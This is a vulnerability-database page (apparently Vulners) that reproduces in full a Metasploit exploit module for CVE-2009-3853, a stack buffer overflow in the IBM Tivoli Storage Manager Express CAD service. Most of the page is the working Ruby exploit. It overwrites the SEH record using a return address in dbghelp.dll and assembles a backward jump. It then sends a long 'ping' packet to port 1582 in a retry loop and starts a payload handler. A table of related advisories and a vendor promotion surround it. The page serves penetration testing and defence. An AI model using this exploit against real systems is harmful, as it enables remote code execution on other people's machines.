Lucene search
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
🗓️ 20 Dec 2009 11:39:09Reported by jduck <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 24 Views
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow. Stack buffer overflow in IBM Tivoli Storage Manager Express CAD Service allows arbitrary code execution. Exploits "ping" packet with long string
Show more
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (1) | 9 May 201000:00 | – | exploitdb |
 | Stack overflow | 4 Nov 200915:30 | – | prion |
| Design/Logic Flaw | 16 Nov 200919:30 | – | prion |
 | CVE-2009-3853 | 4 Nov 200915:30 | – | nvd |
| CVE-2008-4826 | 16 Nov 200919:30 | – | nvd |
 | IBM Tivoli Storage Manager Client CAD Service Buffer Overflow | 20 Nov 200900:00 | – | saint |
| IBM Tivoli Storage Manager Client CAD Service Buffer Overflow | 20 Nov 200900:00 | – | saint |
| IBM Tivoli Storage Manager Client CAD Service Buffer Overflow | 20 Nov 200900:00 | – | saint |
| IBM Tivoli Storage Manager Client CAD Service Buffer Overflow | 20 Nov 200900:00 | – | saint |
 | DSquare Exploit Pack: D2SEC_TSMCAD | 4 Nov 200915:30 | – | d2 |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.
By sending a "ping" packet containing a long string, an attacker can execute arbitrary code.
NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order
for the vulnerable code to be reached. This state doesn't appear to be reachable when the
TSM server is not running. This service does not restart.
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2009-3853' ],
[ 'OSVDB', '59632' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 380, # offset to seh is 384
'BadChars' => '', # none!
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# this target should be pretty universal..
# dbghelp.dll is shipped with TSM Express, and hasn't been kept up-to-date..
[ 'IBM Tivoli Storage Manager Express 5.3.6.2', { 'Ret' => 0x028495d3 } ], # p/p/r dbghelp.dll v6.0.17.0
],
'DefaultTarget' => 0,
'DisclosureDate' => '2009-11-04'))
register_options( [ Opt::RPORT(1582) ])
end
def exploit
print_status("Trying target %s..." % target.name)
# wchar_t buf[64];
#print_status("Generating sploit data...")
distance = payload_space + 8
backjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
copy_len = distance + backjmp.length + (1024*3)
sploit = [0,copy_len].pack('n*')
sploit << payload.encoded
sploit << generate_seh_record(target.ret)
sploit << backjmp
# force hitting end of the stack
sploit << rand_text(1024) * 3
data = [sploit.length,0x26,0xa5].pack('nCC')
data << sploit
got_it = false
while not got_it
connect
print_status("Sending nasty ping request...")
sock.put(data)
begin
buf = sock.get_once(-1, 5)
rescue
print_status("Hrm, the service is probably in the wrong state, stand by...")
disconnect
select(nil, nil, nil, 5)
next
end
got_it = true
end
print_status("Starting handler...")
handler
disconnect
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo20 Dec 2009 11:09Current
7.9High risk
Vulners AI Score7.9
CVSS29.3
EPSS0.7393